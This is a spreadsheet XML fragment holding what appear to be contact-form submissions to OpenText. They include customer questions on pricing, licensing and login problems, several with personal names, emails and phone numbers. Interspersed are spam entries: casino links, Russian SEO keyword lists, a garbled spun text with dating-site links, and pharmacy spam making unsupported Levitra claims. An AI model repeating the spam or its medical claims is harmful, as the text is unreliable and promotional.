    <t xml:space="preserve">недорогие грузоперевозки Россия Беларусь отзывы_x000D_
недорогие грузоперевозки Тюмень отзывы_x000D_
грузоперевозки Пермь отзывы_x000D_
недорогие грузоперевозки Челябинск_x000D_
недорогие международные грузоперевозки Пермь_x000D_
недорогие международные грузоперевозки Томск отзывы_x000D_
международные грузоперевозки Красноярск_x000D_
грузоперевозки Екатеринбург_x000D_
недорогие международные грузоперевозки Омск отзывы_x000D_
международные грузоперевозки Новосибирск отзывы_x000D_
 _x000D_
[URL="https://mityr-trans.com/uslugi"]грузоперевозки Омск[/URL] _x000D_
международные грузоперевозки Томск отзывы_x000D_
недорогие международные грузоперевозки РФ РБ_x000D_
недорогие грузоперевозки Красноярск_x000D_
недорогие грузоперевозки Томск отзывы_x000D_
недорогие международные грузоперевозки Омск_x000D_
грузоперевозки Челябинск_x000D_
грузоперевозки Россия Казахстан отзывы_x000D_
грузоперевозки Пермь отзывы_x000D_
недорогие международные грузоперевозки Екатеринбург_x000D_
грузоперевозки Новосибирск_x000D_
</t>
  </si>
  <si>
    <t>top rated free online casino games _x000D_
[url=http://richcasino2online.com/]best us casinos online[/url] _x000D_
casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
free casino games and poker _x000D_
[url=http://playslotscasino888.com/]pogo casino slots[/url] _x000D_
vegas casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>Hello my name is Rikki Fiske, I emailed you around five days ago to see if you had an internship in forensic science since I saw that you had a job open on indeed.  I am just following up to see if you received my first email, which included my resume as well. If you could email me back as soon as possible that would be great. _x000D_
Thank you, Rikki Fiske</t>
  </si>
  <si>
    <t>Hello my name is Rikki Fiske, I emailed you around five days ago to see if you had an internship in forensic science since I saw that you had a job open on indeed for Forensic Latent Print.  I am just following up to see if you received my first email, which included my resume as well. If you could email me back as soon as possible that would be great. _x000D_
Thank you, Rikki Fiske</t>
  </si>
  <si>
    <t>Am I A winner and how can I get my winnings send to me</t>
  </si>
  <si>
    <t>Medeco requires a current copy of your company W-9 form. Please email to Bruce Martin_x000D_
Bruce.Martin@assaabloy.com_x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>We plan on shutting down our RF servers and would like to move our DIDs to a cloud service so they can still send and receive faxes.  We are thinking about 80 DID numbers.  Does this fix with the services you offer?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello. I have used your fine service but am retiring and wish to discontinue the monthly $12.95 withdrawal from my Visa card ending in 8138. Any questions, please call, thanks.    </t>
  </si>
  <si>
    <t>I am writing to inquire about software pricing of MediaBin. I would like to learn about the technology of the software in conjunction with barcode scanning. There is a technology that will allow customers to scan a barcode from a wristband or card, take a photo and have that photo accessible later. All photos taken with the associated wristband are available to the customer and supplier. At this point, all I know how to do is take a photo and automatically and wirelessly transfer the photo to server in an IMG file format. I need to develop the rest of the technology which includes the file management._x000D_
_x000D_
I apologize ahead of time for the lack of knowledge thus far. I need to first develop a business plan and prototyping and cost analysis is my first step._x000D_
_x000D_
please feel free to contact me by phone or email.</t>
  </si>
  <si>
    <t>Sexual relationship is a pleasurable give to get relationship with one?s partner. If anything goes wrong with this give and take process, it really is enough to derail the connection. But anything sometimes happens and that is unpredictable. Moreover, able to keep a healthy sexual relationship means keeping oneself physically healthy. So just about any sexual disfunction needs to be addressed with utmost care. One such hazard to health is erectile dysfunction commonly seen in men. Unable to keep a proper and prolonged penile erection brings about erectile dysfunction. This is infact a significant problem for maintaining a wholesome sexual relationship. So when there arises this type of problem it?s smart to treat it rather than sitting quiet. _x000D_
 _x000D_
The choice between your various available treatment plans involve treatment which has a proper medicine. Response to an oral agent like Levitra can be very effective with this context. Studies show that erectile dysfunction is primarily on account of insufficient blood circulation towards the penis? veins and lack of stimulation also. Practising oral therapy of Levitra boosts the rate of the circulation of blood that gradually stimulates the penis causing a hard erection, adequate on an intercourse. _x000D_
 _x000D_
 _x000D_
 _x000D_
Levitra is one such drug which can be discovered to be very effective. Clinically it is often proved it even creates patients that are suffering from various health issues like high blood pressure, high-cholesterol or diabetes. A lot of men, who took Levitra for the first time, responded positively for gaining high success rate. Besides, it is often also found it can be also taken with medicines used to treat other health concerns. _x000D_
 _x000D_
&lt;a href="https://www.cialispascherfr24.com/cialis-pas-cher-paris/"&gt;https://www.cialispascherfr24.com/cialis-pas-cher-paris/&lt;/a&gt;</t>
  </si>
  <si>
    <t>Can the OpenText Learning On Demand 1 Year Subscription be purchased with a PO?</t>
  </si>
  <si>
    <t>For a few years now, on and off I am unable to create tickets within the support site.  I am given a page that says I do not have access to the requested resource, and I'm asked to send a confirmation email.  I send the email, log back in, and then I am sent to the same exact screen saying that I do not have access.  This is extremely frustrating.  Can someone please find out what is wrong with my account and why this keeps happening to me?  My preferred contact method is email.</t>
  </si>
  <si>
    <t>One of our customers only trades EDI documents with Opentext, but our integration+EDI service provider is Dell Boomi. How can we access our customer's EDI documents?</t>
  </si>
  <si>
    <t>Looking for price of Tempo Box Express Edition (standalone). Please contact via email as frequently away from phone.</t>
  </si>
  <si>
    <t xml:space="preserve">I have to reset my password and I do not know my old password as it is hidden.  Our ID is R4857A .  </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a discussion around OpenText RightFax_x000D_
</t>
  </si>
  <si>
    <t>Looking for a large enterprise fax solution!</t>
  </si>
  <si>
    <t>looking to implement faxing capability for a home grown HIPAA solution. _x000D_
60000 outbound pages/month_x000D_
20000 inbound pages/month</t>
  </si>
  <si>
    <t>casino online usa _x000D_
[url=http://richcasino2online.com/]casino online free[/url] _x000D_
casino online gambling _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online free&lt;/a&gt; _x000D_
pogo casino slots _x000D_
[url=http://playslotscasino888.com/]play casinos[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>My husband, John Travers, is an OpenText employee on LTD.  I have been trying to contact OpenText's HR Benefits administrator for some time to get information.  As a last resort, I'm sending an email to the Contact Us Page of OpenText.  Please let me know who to contact in the HR department, or have someone contact me by email or phone.  _x000D_
_x000D_
Thank you,_x000D_
Jeanne Travers</t>
  </si>
  <si>
    <t>We currently have Alchemy 9.0 and we are interested in what Alchemy 16.2 might have to offer us.  We are also interested in any other document management software you might have available.</t>
  </si>
  <si>
    <t>Need to get a Business Associate Agreement related to HIPAA signed by your organization since we regularly fax medical records and banking info.  Could you let me know who I should talk to about this?  We have an existing fax2mail account with Easylink.  Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
We are in receipt of Check No. 2000013794 in the amount of $39.81 received 07/05/2018; unfortunately we are unable to determine the account number to apply the payment. Please provide the account number and or copy of invoice/statement so we may apply accordingly. If you have any questions, please don’t hesitate to contact me._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Daphonie Hawthorne_x000D_
AT&amp;T Global Payment Strategies _x000D_
and Operations_x000D_
4331 Communications Dr._x000D_
Dallas, TX  75211_x000D_
214-721-3626_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
We are in receipt of Check No. 2000013792 in the amount of $39.81 received 07/24/2018; unfortunately we are unable to determine the account number to apply the payment. Please provide the account number and or copy of invoice/statement so we may apply accordingly. If you have any questions, please don’t hesitate to contact me._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Daphonie Hawthorne_x000D_
AT&amp;T Global Payment Strategies _x000D_
and Operations_x000D_
4331 Communications Dr._x000D_
Dallas, TX  75211_x000D_
214-721-3626_x000D_
</t>
  </si>
  <si>
    <t>Мой viber, whatsApp: пишите 8-996-725-57-87  скайп kruzzor _x000D_
 _x000D_
Могу долго расписывать какой я молодец, сколько десятков лет у меня опыта в данной сфере, но я предпочитаю "воде" реальные факты.Поэтому хватит лирики, вот что я могу предложить: _x000D_
------------------------------------ _x000D_
1. Качество услуг на уровне ведущих компаний. _x000D_
--- _x000D_
2. Цены существенно ниже чем в компаниях (зачастую в разы). _x000D_
--- _x000D_
3. Постоянная доступность, готовность ответить на интересующие Вас вопросы (ну разве что не ночью), то есть не нужно писать письма и сутками ждать ответа. _x000D_
--- _x000D_
4. ГОТОВ ПРЕДОСТАВИТЬ ПОРТФОЛИО РЕАЛЬНЫХ РАБОТ. ПРОВЕРИТЬ МОЖНО ПРОСТО ПОЗВОНИВ ПО НОМЕРАМ, УКАЗАННЫМ НА САЙТАХ. _x000D_
--- _x000D_
5. Мой опыт работы в рекламном агентстве позволяет выделить ваш продукт среди конкурентов, что значительно повысит вашу прибыль от сайта в дальнейшем. _x000D_
--- _x000D_
6. Люблю креативить. Это можно увидеть в моих работах. _x000D_
--- _x000D_
7. При желании можно встретиться и побеседовать лично. _x000D_
--- _x000D_
8. Также могу предложить: SEO продвижение сайта, контекстную рекламу Я.Директ и SMM продвижение в социальных сетях _x000D_
--- _x000D_
Я надеюсь, что первоначальной информации достаточно, ЗВОНИТЕ ;) _x000D_
------------------------------------- _x000D_
Сайт-визитка, лендинг, лэндинг, landing page, интернет-магазин, портал, корпоративный сайт.</t>
  </si>
  <si>
    <t>Obtaining PO numbers for invoicing</t>
  </si>
  <si>
    <t>I had an annual account program set-up with hightail and now I am unable to log-in on opentext</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We have Documentum and CAPTIVA. We've been working with your implementation partner AMPLEXOR here in Luxembourg for several years, but we would like to change. I haven't found any other company in the Greater Region around Luxembourg who could deliver CAPTIVA support._x000D_
_x000D_
We'd like to have alternative offers for support for our CAPTIVA scanning infrastructure. Any partner located in Benelux, Germany and France would be welcome._x000D_
_x000D_
Thanks for your reply._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Christine_x000D_
Could you please help us? </t>
  </si>
  <si>
    <t>Product catalogue is from 2016 and is missing many products - needs to be updated ASAP.</t>
  </si>
  <si>
    <t>What is the end of life date for MediaBin?</t>
  </si>
  <si>
    <t xml:space="preserve">  на вышеприведенном интернет-блоге [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] можно взглянуть на большой ассортимент эксклюзивных статей о туризме.</t>
  </si>
  <si>
    <t>Want to explore careers here by joining Open Text.Request you to share the details on further process.</t>
  </si>
  <si>
    <t xml:space="preserve">Billing questions:  I have received 2 invoices.  Would like clarification on payment amount.  We are also a tax exempt cooperative.  What info do you require for our tax exempt status? </t>
  </si>
  <si>
    <t>Regarding job</t>
  </si>
  <si>
    <t>we need to understand if the current license for Exceed has allowance for upgrade from version 14 to 15?  The  client would like to move to version 15 with the advent of the Win10 migration, but needs to understand if their licensing agreement allows for that._x000D_
_x000D_
We have all all the PO information. So could you please confirm do you need that or not?</t>
  </si>
  <si>
    <t>Dear opentext team,_x000D_
_x000D_
looking for a new modern document management solution which extends our current tool landscape, opentext caught our attention._x000D_
_x000D_
Basically, we need a new document management solution which provides a solid basis for all processes with respect to global document control and exchange for all documented information which is required to conform to audit standards as far as it is not covered by other tools. As a consequence, e-mailing or file system exchange shall be replaced for that purpose. An additional benefit is the possibility to integrate with ERP systems like SAP._x000D_
_x000D_
Please tell me whether you can offer a solution that meets the requirements from the list below without customizing. Please inform me about the cost, in case customizing is required for such a solution._x000D_
_x000D_
Please give me also details on_x000D_
•	HW requirements / EU based hosted solutions (cloud)_x000D_
•	Migration and development effort, needed support for introduction/ migration, possible timeline_x000D_
•	Training effort_x000D_
•	License models/ cost per user/ floating licenses_x000D_
_x000D_
I need this information as a preparatory basis for an investment decision._x000D_
_x000D_
Please send me information about possible fulfillment of the listed requirements and cost information or an offer until August 8th 2018._x000D_
_x000D_
Best regards_x000D_
Franz Putz_x000D_
_x000D_
****_x000D_
List of DMS requirements_x000D_
_x000D_
1.	Versioning, version history for documents_x000D_
2.	Retrieval of defined document versions_x000D_
3.	Defined validity date for documents_x000D_
4.	Automated deletion/ deactivation of documents at a defined date_x000D_
5.	Easy import of existing documents (e.g. from file trees)_x000D_
6.	Version-independent file link_x000D_
7.	Hyperlinks to other documents, cross references_x000D_
8.	User acess rights administration_x000D_
9.	Traceability of changes_x000D_
10.	Metadata_x000D_
11.	Connection of a release status with a workflow_x000D_
12.	Status tracking - notification_x000D_
13.	Labelling (e.g.Baseline, release version)_x000D_
14.	Full text search in different document types_x000D_
15.	Support of access to standards (e.g. full</t>
  </si>
  <si>
    <t>Want to know if TeleForm support Thai language OS UI and OCR</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext team, _x000D_
_x000D_
Previously we were from hightail but now we are unable to log into our account for hightail due to prompt window, "Hightail is now Opentext" and there is no way to log into our old account. _x000D_
_x000D_
The account is under our general email address: info@facility-asia.com.sg _x000D_
_x000D_
Please let us know what is the reason for this? _x000D_
_x000D_
Thank you. </t>
  </si>
  <si>
    <t>Invitation to Powertrends 2018 -conference on  Energy Power &amp; Electricity .  May we know to whom we are going to address the invitation.  Thanks .</t>
  </si>
  <si>
    <t>I bought  Brava! Desktop DXP 16.4, but the mail including "License instructions for Brava! Desktop DXP 16.4" has no valid link:_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Whats wrong?_x000D_
Best regards_x000D_
Claus</t>
  </si>
  <si>
    <t xml:space="preserve">грузоперевозки Тюмень_x000D_
недорогие международные грузоперевозки Новосибирск отзывы_x000D_
недорогие международные грузоперевозки Россия Казахстан отзывы_x000D_
недорогие международные грузоперевозки Красноярск отзывы_x000D_
недорогие грузоперевозки Омск_x000D_
недорогие международные грузоперевозки Екатеринбург_x000D_
международные грузоперевозки Омск отзывы_x000D_
международные грузоперевозки Новосибирск отзывы_x000D_
недорогие международные грузоперевозки_x000D_
недорогие международные грузоперевозки Челябинск_x000D_
 _x000D_
[URL="https://mityr-trans.com/avtopark/20-tonnik-s-izotermicheskim-polupricepom.html"]недорогие грузоперевозки Новосибирск отзывы[/URL] _x000D_
международные грузоперевозки Омск_x000D_
международные грузоперевозки Россия Беларусь отзывы_x000D_
недорогие грузоперевозки Челябинск_x000D_
грузоперевозки Пермь отзывы_x000D_
недорогие грузоперевозки Тюмень отзывы_x000D_
недорогие грузоперевозки Красноярск отзывы_x000D_
недорогие международные грузоперевозки Россия Казахстан отзывы_x000D_
грузоперевозки Омск отзывы_x000D_
недорогие международные грузоперевозки Красноярск отзывы_x000D_
недорогие грузоперевозки РФ РБ отзывы_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Peels help to eliminate from the greater part age amendments dermatological layer. operations effective at any age, suitable for skin layer of any species. After light peeling disappear minor wrinkles, epidermis turns out young, without wrinkles. Recovery – 3 days. deeper peeling efficiently struggles wrinkles (expression, age, affects little pits, eliminates age spots. _x000D_
Rehabilitation – 7 days. Deep peeling conducting in the beauty hospitals. This is very effective operation, however requires long term recovery – about one month. _x000D_
[url=http://chemicalpeel.in/acne-scars-before-and-after-chemical-peel-do-they-look]acne scars before and after chemical peel[/url] </t>
  </si>
  <si>
    <t>We are looking for a document management system to implement in the company. Also interested in OCR technology to read and store data from scanned documents.</t>
  </si>
  <si>
    <t>Hi, my company is using xPression 4.6 SP1. We are unable to deploy changes to a xPression server. It is producing the following error message: MIGRATE00100101E:The import was terminated because of an error Transaction rolled back; nested exception is: com.dsc.uniarch.cr.error.CRLockException:...._x000D_
_x000D_
My company need to resolve this is ASAP, we have urgent testing to complete to enable a production deployment in 2 days time. _x000D_
_x000D_
Are you able to provided advice in resolving this issues ASAP?</t>
  </si>
  <si>
    <t>casino games list _x000D_
[url=http://richcasino2online.com/]best us casinos online[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;vegas casino games&lt;/a&gt; _x000D_
casino online usa _x000D_
[url=http://playslotscasino888.com/]pogo casino slots[/url] _x000D_
best us casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to talk about new companies interested in having business relationships with you._x000D_
_x000D_
We have dataset with data fields of : Film production companies, Manufacturing companies, Surveying and Mapping agencies, Construction companies, Defense and Intelligence, Natural Resources (Agriculture, Forestry, Petroleum and water resources), Utility and communication companies, Mining companies, Public Safety, Aviation and Aerospace, UAV companies, Security, IT companies and many more businesses._x000D_
_x000D_
Additionally we have details of : 3D visualization, Aerial photogrammetry, Aerial photography, Airborne laser scanning, Building and architectural surveys, Buried services tracing, Cartographic production, Control surveys, Digital terrain analysis, Deformation monitoring, Geophysical investigation, GIS data capture, GIS Mapping, GPS &amp; satellite positioning, Ground radar, Heritage surveys, Industrial measurement &amp; metrology, Modeling and visualization, Remote sensing, Terrestrial laser scanning, Terrestrial photogrammetry, Pipeline, railways and linear surveys, Proving surveys, Setting out for construction, Setting out surveys, Survey equipment suppliers, Topographic surveys, Underground services tracing and surveys, Unmanned aerial vehicles (UAV's) and many more._x000D_
_x000D_
If yes, kindly let me know the specific industry you are interested in and I will send you unpaid sample file of companies for your review;_x000D_
_x000D_
Target Industry :_x000D_
Target Job Title :_x000D_
Target Geography :_x000D_
_x000D_
I look forward to your reply.  _x000D_
_x000D_
Best Regards,_x000D_
Kiyara James</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://rsk-nn.ru]вибропрессованная тротуарная плитка[/url]   - подробнее на сайте [url=http://rsk-nn.ru]rsk-nn.ru[/url]</t>
  </si>
  <si>
    <t>This is Shahzad Siddiqui. I completed VIM OpenText Certification in 2014 under my email shsiddiqui@deloitte.com. Can I have my certificate emailed to me please at ss0205@hotmail.com. Thanks!</t>
  </si>
  <si>
    <t>здесь на   интернет-блоге [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран огромный ассортимент уникальных новостей о туризме.</t>
  </si>
  <si>
    <t>у нас на данном  портале [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] собран огромный ассортимент свежих новостей о туризме.</t>
  </si>
  <si>
    <t>Pricing for Gupta Team Developer. Have older applications that we may upgrade but price of tool is part of the decision.</t>
  </si>
  <si>
    <t>Dears, _x000D_
we have a requirement for eFAX solution (8 FAX channels / 100 users (email clients))  calls will be routed through Mitel MX-ONE PBX system. would you please advise how we can get prices and support._x000D_
Best Regards, Hakeem</t>
  </si>
  <si>
    <t>I need to speak with our account representative concerning our GXS (Inovis) installation._x000D_
_x000D_
Thank you,_x000D_
Mark Haanpaa</t>
  </si>
  <si>
    <t>We are compiling recommendations for our government agency customer for their asset management program. Please advise if Documentum can operate independently from/without internet access and whether or not it is ISO 9001 compliant. Many thanks in advance. AC</t>
  </si>
  <si>
    <t>We are currently using exstream version 7.0 with annual subscription.We are considering to upgrade to 16.4 as we upgrade our technology platform. Is it possible for us to download a trial version exstream designer and engine for version 16.4?  Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">We are on a trial basis with Brava IXL to see if this is going to work for our needs.  _x000D_
We need to transfer TIF files to existing TIF files, will this work for this operation?  Brava IXL or “BATCH” are these separate application or  accessible together?_x000D_
</t>
  </si>
  <si>
    <t>AGA... We're in need of archiving a SP 2010 site before we move to 2016 and want to preserve the data for future search and compliance needs.</t>
  </si>
  <si>
    <t>We are putting together an RFP response and would like to include RightFax as the faxing solution.  Unfortunately we are in a bit of a time crunch.  So a response this afternoon would be necessary so that we can get a quote together.</t>
  </si>
  <si>
    <t xml:space="preserve">UNSD this is UNSD_x000D_
_x000D_
behaves as a global core with document on international reach and international, international,global marketing exchange punches, indigenous company accounts, time, exchange, healthy environment and market and social statistics farmed ranging from nationalCoordinates program record workshops and outings vested at the split according to the not fee additionally the panel to sychronisation _x000D_
_x000D_
using record techniques (CCSA)_x000D_
_x000D_
uses insight and in addition secretarial service to the un record cut_x000D_
_x000D_
allows the follow up and after that guide steps involved in the 2030 intention to produce safe advance, being Secretariat of the Inter outfit and educated corporation on your SDG readers and maintaining the worldwide SDG storage system _x000D_
_x000D_
proclaims modern surveying and [url=https://twitter.com/chnlovereview]chnlove scam[/url] mapping treatments as an instrument to make development and growth_x000D_
_x000D_
unquestionably the team typically publishes resources changes, such as record Yearbook and / or community Statistics budget, but also school materials has reported [url=https://myasiansoulmate.com/chnlove-com-review]chnlove[/url] onto statistical statistics means. typically the Division's data source are offered also on this site [url=https://vimeo.com/61585334]chnlove[/url]._x000D_
</t>
  </si>
  <si>
    <t>new usa online casinos _x000D_
[url=http://richcasino2online.com/]casino games roulette[/url] _x000D_
new usa online casinos _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online application&lt;/a&gt; _x000D_
casino games roulette _x000D_
[url=http://playslotscasino888.com/]casino online gambling[/url] _x000D_
casino online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
new usa online casinos 2017</t>
  </si>
  <si>
    <t>explore licensing fees for EnCase Acquisition</t>
  </si>
  <si>
    <t xml:space="preserve">Hi my director asked my to do a POC on Captiva Mobile SDK  for iOS and Android.  I am having trouble finding any documentation or download for iOS and Android. Install guide, usage examples, etc..  </t>
  </si>
  <si>
    <t>Our customer is trying to convert pdf, but converted document wasn't converted properly, All spaces(whitespace) are removed. It contained non-embedded fonts(ArialMT). I don't know what is the reason. Please respond me as soon as possible</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings, my name is Paul and I'm with Gryphon and we are in the process of conducting a routine background check on a former employee of GXS which was acquired by OpenText in 2013. I'm not sure if this would be the proper avenue for doing so, however, I was hoping to get in touch with your human resources department in order to see whether you may still have those employment records (I would only need last title and start and end date). Please advise as to whom I would need to speak to in order to conduct this verification? Thank you, Regards. - Paul  </t>
  </si>
  <si>
    <t>Looking for opportunity</t>
  </si>
  <si>
    <t>i was a hightail subscriber, now i cn'\t get in to send files, what's gong on?   how do i do it????</t>
  </si>
  <si>
    <t>Interested in pricing for connect product please..</t>
  </si>
  <si>
    <t>WLGore is a customer of OpenText and I am looking for some evidence that OpenText follows a Quality Management Standard with regards to your software products, such as ISO 9000..._x000D_
Please respond via email._x000D_
Thanks.</t>
  </si>
  <si>
    <t>Senhores bom dia. Estou precisando comprar o OpenText Brava Reader para minha empresa. Mas preciso que o valor seja em Reais e que emitam nota fiscal. Como devo proceder?</t>
  </si>
  <si>
    <t>we are upgrading our rightfax server to server 2012 , I need the requirements for the server, migration instructions and the latest software Please</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
I'm a SAP employee (Customer Success Manager) in charge of a few accounts in Chile. Recently I've had a request from an important manufacturer on this region (Empresas CMPC S.A.)._x000D_
They would like to have an user manual of OpenText, hopefully in spanish. There is no way for me to find it online._x000D_
Is there a way that you can please suggest me how to get that file?. Or at least indicate me what is the right team I have to contact regarding this kind of requirements._x000D_
I'll really appreciate some guidance._x000D_
_x000D_
Thank you in Advance,_x000D_
Jaime Formas</t>
  </si>
  <si>
    <t>I had a Hightail account and now cannot get logged in.  Cancel my account immediately.  I'll find another vendor.</t>
  </si>
  <si>
    <t>Was looking for current corporate approved powerpoint</t>
  </si>
  <si>
    <t xml:space="preserve">Confirm </t>
  </si>
  <si>
    <t>Hello - I recently read a white paper published by TSG that was funded by AlFresco. The white paper compares AlFresco to Documentum. I'm wondering if Documentum has published a response since the white paper is very strongly in favor of AlFresco. I'm trying to understand as objectively as possible the advantages and limitations of each as I'm determining implementation route for a government client. Thanks, Julie</t>
  </si>
  <si>
    <t>How do I purchase licensing My Documentum for Desktop?</t>
  </si>
  <si>
    <t>Looking into fax solutions for a growing branch office in Provo, Utah.  Need to compare cost of physical faxes/phone lines with software-based solutions.  For comparison basis, our headquarters uses Faxcom as an outbound solution.  We'd like to discuss a software solution that can do outbound and inbound routing to printers via IP address.</t>
  </si>
  <si>
    <t>SRC is actively looking for a content management solution.  Please contact me regarding SRC's business needs.  Thank you, Aaron</t>
  </si>
  <si>
    <t>Hi!_x000D_
_x000D_
Kindly help me forward this to the person who handles your company events for their reference._x000D_
_x000D_
Thank you in advance!_x000D_
_x000D_
Greetings from The Palace Manila!_x000D_
_x000D_
I am Jeri Cua, Banquet Sales Officer at The Palace Manila._x000D_
I would like to offer you our venues for your corporate, personal or client related events. Available rates upon request of our venues. The Island, Revel, Yes Please, Aracama/Early Night and BAD._x000D_
_x000D_
If you have any questions, don't hesitate to ask me. Should you want to schedule an ocular to see any of the venues just give me a call at M. 0917.626.2372 T. 978.1148 between 11am to 7pm or send me an e-mail at banquet.sales@thepalacemanila.com. _x000D_
_x000D_
We look forward to working with you on your event._x000D_
_x000D_
Best Regards,_x000D_
Jeri</t>
  </si>
  <si>
    <t>Cotação do Software Exceed on Demand.</t>
  </si>
  <si>
    <t xml:space="preserve">HI OpenText support_x000D_
_x000D_
my question regarding the Exceed On Demand License behavior and how it works , in  case we have the following options !?_x000D_
_x000D_
-	One user connect to the EOD server , then he opens multiple  sessions to several machines ._x000D_
-	Several users connect to the same EOD server , then each user has one session to his machine _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://rsk-nn.ru]тротуарная плитка цена[/url]   - подробнее на сайте [url=http://rsk-nn.ru]rsk-nn.ru[/url]</t>
  </si>
  <si>
    <t>I have been trying to contact someone for about a week now. My colleague has left a message with no response. Our Legal department is interested in Open Text Edocs, I would like to ask a couple questions about the software. Please contact me by email to set up a time that we can discuss Edocs.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, ich bin auf der Suche nach einer Softwarebescheinigung für das eingesetzt OpenText Archiv beider Skoda Auto a.s, in Mlada Boleslav. Sofern Sie mir diese snicht zukommen lassen können, wäre ich für die Benennung eines konkreten Ansprechpartner sehr verbunden.  Vielen Dank. Mit freundlichen Grüßen, Manuel Schulte</t>
  </si>
  <si>
    <t>OpenText Exceed On Demand Production ,Are there any agents in China._x000D_
Our hope understand producation._x000D_
Mail: david.guo@dji.com_x000D_
Tel: 13816126324</t>
  </si>
  <si>
    <t>Looking for a new implementation partner for our EIM solution._x000D_
I would like to talk with someone who could help us to find a solution.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to explore a centralized CMS solution. In Phase 1, I will build one informatic website in the begining with HA feature, estimated traffic is 12500 in amount. In future, we will revamp the old website step by step and try to migrate them in one single CMS platform, could you advise me a product and the estimated cost and infrastructure? Thanks </t>
  </si>
  <si>
    <t xml:space="preserve">Good day, hereby I would like to find out the contact numbers for a FM we can contact regarding your banking details. I cannot pay the account due to the fact that I cannot get hold of anyone and the Johannesburg branch rudely told be they are in a meeting and put the phone down in my ear_x000D_
</t>
  </si>
  <si>
    <t>I need a fax to email solution for a customer in the ANZ region, need to submit the solution with pricing early next week.</t>
  </si>
  <si>
    <t>Любому творческому человеку есть что показать многолюдной аудитории. Это мастер-классы по уходу за детьми, урок вышивания или немецкого, профессиональный тренинг, медицинская консультация. Видеотрансляция качественного ролика привлечет аудиторию и даст возможность заработать достойный заработок. _x000D_
Когда зрители будут платить? За доступ к полезной видеотрансляции, право задавать вопросы ведущему. Пользуются повышенным спросом качественные ролики с презентацией нужных навыков, обучающие видео. Создание и трансляцию сюжета заказывают профессионалам – и результат обеспечен! _x000D_
[url=http://www.mediamost.net/organizovat-video-translyatsiyu/]как транслировать видео в интернет[/url]</t>
  </si>
  <si>
    <t>I want to learn on how document presentment live and its integration with SAP and Streamserve</t>
  </si>
  <si>
    <t>I’m interested in your services please contact me</t>
  </si>
  <si>
    <t>I have been an ongoing customer of Hightail, which now belongs to OpenText. So how do I log in? Do I need to create a brand new account, or can my Hightail be carried over? When I go to the Hightail web page and click on Sign In, it simply sends me to a dead end with no information about the takeover sale, and no link to OpenText, and no explanation of how to sign in.</t>
  </si>
  <si>
    <t>play casinos _x000D_
[url=http://richcasino2online.com/]casino games roulette[/url] _x000D_
casinos online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;vegas casino games&lt;/a&gt; _x000D_
best online casino games free _x000D_
[url=http://playslotscasino888.com/]pogo casino slots[/url] _x000D_
free casino games and poker _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games list&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t xml:space="preserve">Dear all,_x000D_
_x000D_
My customer wants to buy 6 Brava! Desktop TX with 1 year Brava Desktop Maintenance licenses. When I add my name at Credit card information to process payment for buying online at your website, it automatically change the name of my customer (on license form) to my name on credit card._x000D_
Please help me to your advised this case, because we have to add my customer's name compliance with her email on the license._x000D_
How we can process order as soon as possible?_x000D_
_x000D_
Thanks &amp; Best Regards,_x000D_
Tran Thi Hong Anh -  Sales Manager_x000D_
[Email]: sales102@vietcad.com  -  [Mobile]: 0902 405 971_x000D_
[Skype]: live:sales102.vietcad _x000D_
  </t>
  </si>
  <si>
    <t>Любому творческому мастеру есть что продемонстрировать широкой аудитории. Это практические занятия по уходу за детьми, урок вышивания или французского, личностный тренинг, юридическая рекомендация. Онлайн трансляция качественного сюжета привлечет аудиторию и даст возможность получить хороший доход. _x000D_
Когда подписчики заплатят? За допуск к оригинальной онлайн трансляции, возможность спрашивать тренера и получать ответ. Пользуются хорошим спросом профессиональные уроки с презентацией полезных умений, обучающие видео. Формирование и выпуск сюжета заказывают специалистам – и успех обеспечен! _x000D_
[url=http://www.mediamost.net/veb-translyatsii-onlajn/]создать свою трансляцию онлайн[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
We are interested in purchasing and deploying Opentext captiva advanced recognition software at our company as we have some documents that have handwritten text and we want to be able to read or search the  scanned documents. </t>
  </si>
  <si>
